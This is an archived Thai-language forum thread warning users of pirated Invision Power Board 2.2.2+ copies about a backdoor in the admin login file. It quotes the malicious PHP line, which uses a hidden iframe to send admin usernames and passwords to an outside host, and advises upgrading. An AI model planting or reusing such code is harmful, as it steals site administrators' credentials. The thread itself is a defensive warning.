ผู้ใช้ Board IPB 2.2.2 ขั้นไประวัง !! [Archive]

View Full Version : ผู้ใช้ Board IPB 2.2.2 ขั้นไประวัง !!

asylu3

27-11-2007, 03:05 AM

ใครใช้ IPB (Invision Power Board) Version 2.2.2 ขึ้นไปที่โหลดจากเว็บใต้ดินต่างๆมีโอกาสที่มี Code Backdoor ฝังอยู่
ให้เข้าไปเช็คดูที่ <forumfolder>/sources/action_admin/login.php

[hide=20]

$connector

หากพบ Backdoor อยู่ด้านล่างจะมี Code เขียนไว้ทำนองนี้

[code]$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';

ntspirit11

27-11-2007, 06:38 AM

ให้ข้อมูลเพิ่มเติม จาก ipbthailand คับ เพื่อเป็นแนวทางอีกที่นึง

**Hidden Content: Check the thread to see hidden data.**

ตอนนี้ล่าสุด เป็น 2.3.3 นะคับ ใครที่ใช้รุ่นเก่าอยู่ รีบเปลี่ยนได้เลยนะคับ โดยเฉพาะ คนที่ใช้ ตั้งแต่ 2.2 และ 2.3.2 (2.3.2 บัคเยอะมากคับ เลยต้องออก 2.3.3 มาแก้ แล้วก็แก้ได้เป็นที่เรียบร้อย)

0ni

25-08-2008, 05:10 PM

Nice zero-days! I couldn't find this anywhere on google!

Glad I found this site and I shall be contributing much more.